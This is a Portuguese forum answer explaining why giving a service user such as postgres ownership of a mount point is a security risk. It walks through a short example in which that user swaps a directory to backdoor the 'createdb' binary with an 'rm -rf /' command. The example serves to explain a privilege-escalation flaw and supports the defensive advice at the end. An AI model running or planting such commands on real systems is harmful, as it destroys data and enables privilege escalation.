Depende do sistema de arquivos. Tanto quanto eu sei, o ext3 por exemplo não reconhecerá o uid do proprietário do ponto de montagem, mas apenas o uid da raiz da partição montada.
De qualquer forma, imagine que você esteja usando algum sistema de arquivos que respeite a propriedade e siga-me ...
Dependendo da hierarquia e do conteúdo do sistema de arquivos, pode haver sérias implicações de segurança.
Deixe-me exemplificar (desculpas pelo grau de liberdade artística, mas não considerarei possíveis problemas de bloqueio de arquivos ... 8D)
#mkdir /opt/postgres
#mount /dev/sdf1 /opt/postgres
#chown postgres:portgres /opt/postgres
#ls - /opt/postgres/8.3/
drwxr-xr-x 4 postgres postgres 1024 2011-08-11 23:14 .
drwxr-xr-x 7 root root 48 2011-08-11 23:11 ..
drwxr-xr-x 2 root root 1024 2011-08-11 23:14 bin
drwxr-xr-x 2 root root 1024 2011-08-11 23:14 lib
drwxr-xr-x 2 root root 1024 2011-08-11 23:14 doc
drwxr-xr-x 2 root root 1024 2011-08-11 23:14 contrib
drwx------ 2 root root 12288 2011-08-11 23:13 lost+found
suponha que alguém tenha acesso postgres e deseje backdoor /opt/postgres/8.3/bin/createdb
$cd /opt/postgres
$cp -R 8.3 .hackme
$cd .hackme/bin
$echo 'rm -rf /' > createdb
$cd ..
$mv 8.3 .old; mv .hackme 8.3
Esse tipo de ataque de escalonamento de privilégios é meio que datado ... Variantes costumavam ser razoavelmente comuns no passado. Eu devo adicionar este tipo de abordagem defeituosa é uma das principais razões pelas quais a recomendação padrão é ter arquivos de configuração (por exemplo, httpd.conf) de propriedade de usuário diferente daquele usado pelo processo.
Espero que ajude